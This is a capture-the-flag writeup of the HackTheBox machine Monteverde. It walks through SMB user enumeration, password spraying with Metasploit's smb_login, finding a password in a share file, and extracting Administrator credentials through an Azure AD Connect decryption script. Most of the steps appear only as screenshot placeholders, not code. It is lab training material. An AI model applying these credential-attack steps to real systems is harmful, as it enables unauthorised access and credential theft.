Home Monteverde Writeup
Post
Cancel

Monteverde Writeup

Reconnaissance

Let's start off with a NMAP scan
-sV: Probe open ports to determine service/version info
-sC: equivalent to --script=default

desktop

We see this machine does not have any webserver, ssh or anything like that. It does have smb which we can try enumerate first.
We run the command enum4linux 10.10.10.172 to see if we can get a list of users, groups and any information we can use.

desktop

From the results, we get a list of users, along with groups but for now we will only focus on the users.
Take the list of users and put them into a file. In my case, users.txt
We are going to use this to bruteforce smb login.
Set the relevant options and use the users.txt file for both user and password list.
Reason I am doing this is I usually test for default passwords as an easy win.

desktop

Foothold

You can try the usernames and password manually but I tend to automate things for quicker results.
Let us start up mfsconsole and use the smb_login module to enumerate throught the list.

desktop

We find a hit!
Let's use this with a command called smbclient to see what shares we can access and find any files or infomation we can use to further enumerate.

desktop
desktop

We grab the azure.xml file and we find the following juicey information.

desktop

We find a password. Let us use that password for the user mhope to log into the machine via evil-winrm.

desktop

What do you know, we are logged in and browsing to the Desktop folder we have the user flag!

Exploit to Administrator

Let's browse the user's folders and see what we can find.

desktop

There is a .Azure folder which could be a hint as to what to look for.
Checking the user's access shows us what groups he is part of and see what users that group has access to.

desktop
desktop

Let's check on the system for any Azure applications installed. We find that Azure AD Sync is installed in the following location.

desktop

Now it's time to see if we can find any articles for some way to use this service for any escalation.

desktop

I am not going to explain what happens here, go read it for yourself.
Azure AD Connect for Red Teamers
On the page we can find the POC which connects to the SQL localdb, grabs the encrypted hash, decrypts it and gives us the gold!
We first download the file or copy the contents into a file. e.g azure_decrypt.ps1
It didn't work at first but after some troubleshooting and reading up on connecting to SQL via the CLI I had to change a part in the parameters to get it working 100%.

desktop
desktop

Once the changes are done, connect back to the machine, upload the powershell script, change directory to the Azure AD Sync directory and run the powershell script.

desktop

We now should have the administrator credentials which we can use now to login to the machine via evil-winrm and grab the root flag!

desktop

This post is licensed under 0x3n0 by the author.

HackTheBox - Blunder

HackTheBox - Academy